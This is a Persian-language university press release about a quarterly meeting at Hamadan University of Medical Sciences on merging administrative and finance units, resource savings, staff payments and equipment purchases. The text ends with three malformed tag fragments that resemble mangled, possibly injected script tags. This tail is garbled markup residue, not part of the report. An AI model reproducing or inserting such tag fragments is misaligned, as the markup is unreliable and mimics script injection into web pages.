جلسه فصلی معاون توسعه مدیریت و منابع دانشگاه با معاونین اداری و مالی دانشکده های دانشگاه علوم پزشکی همدان

جلسه مشترک معاونت توسعه و دانشکده های تابعه با حضور معاون توسعه مدیریت و منابع دانشگاه ، مدیران مختلف این حوزه و معاونین امورمالی و اداری دانشکده ها  با موضوع طرح ادغام واحدهای اداری مالی برگزار شد.

به گزارش روابط عمومی معاونت توسعه؛ مهندس بهروز رحیمی ضمن تاکید بر نقش کلیدی کار تیمی و گروهی در اثربخش بودن اقدامات و برنامه های مجموعه دانشگاه ؛ همبستگی و همدلی کلیه واحدهای تابعه را عاملی مهم و اساسی در کسب دستاوردها و موفقیتهای این حوزه و کلیه واحد های مختلف دانشگاه  دانست.

معاون توسعه مدیریت و منابع از انجام اقدامات مناسب و برنا مه ریزی شده در راستای مدیریت بهینه انبارها ؛ استقرار  زنجیره تامین کالا و خدمات بویژه در خصوص اقلام سرمایه ای؛  تامین مناسب  داروهای حیاتی و ملزومات مصرفی استراتژیک  پزشکی خبر داد.

وی در ادامه ضمن اشاره به این نکته که مدیریت به فاکتورهای کیفی و اثرگذاری آن وابسته است افزود: اقدامات تاثیرگذاری  در راستای مدیریت بهینه منابع مانند راه اندازی سیستم پکس ، استفاده مجدد از آب سیستم R-O و اصلاح دستورات روتین در بیمارستانها صورت گرفته و نتایج پایش حاکی از  صرفه جویی قابل توجه در هزینه ها می باشد.

مهندس بهروز رحیمی در ادامه تحلیل و بررسی منابع مالی و بودجه ای دانشگاه و همچنین تهیه  و تدوین گزارشات  تحلیلی مختلف را  ابزاری مهم در سیاستگذاری صحیح و تصمیم گیری بموقع و موثر دانست. همچنین ایشان راه اندازی سامانه ساقر را اقدامی مهم در راستای کنترل و نظارت بر حوزه قراردادها و مدیریت  نیروهای شرکتی در دانشگاه قلمداد کرد.

وی در ادامه پرداخت منظم کارانه پزشکان ؛ اعضای هیات علمی ، کارکنان و همچنین کاهش بدهی پرسنل به ۶ ماه را از  عوامل موثر در حفظ آرامش دانشگاه عنوان کرد و افزود:اگر در این راستا اقدام تیمی و حمایت های همه جانبه مدیران و مسئولین واحد های مختلف دانشگاه نبود قطعا به این دستاورد مهم دست نمی یافتیم.

معاون توسعه مدیریت و منابع دانشگاه همچنین به دیگر اقدامات مهم اخیر این معاونت نظیر خرید دستگاههای شتاب دهنده و دستگاههای سی تی اسکن و ارزیابی مجدد املاک ، تاسیسات و مستقلات دانشگاه اشاره کرد.مهندس بهروز رحیمی در پایان افزود: اگر از منابع موجود  بصورت صحیح و هدفمند برای خدمت رسانی به مردم استفاده کنیم میتوان این انتظار را داشت  که در آینده با کمبود اعتبارات و منابع مواجه نشویم . همچنین با توجه به وجود تیم مدیریتی و اجرایی قوی در دانشگاه و همبستگی کارشناسی و اخلاقی آنان با یکدیگر میتوان به راحتی از معبر های پیش رو گذر کرد.در ادامه نقطه نظرات و پیشنهادات مدیران حوزه های مختلف معاونت توسعه و معاونین اداری مالی دانشکده های دانشگاه طرح  و بررسی شد.<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>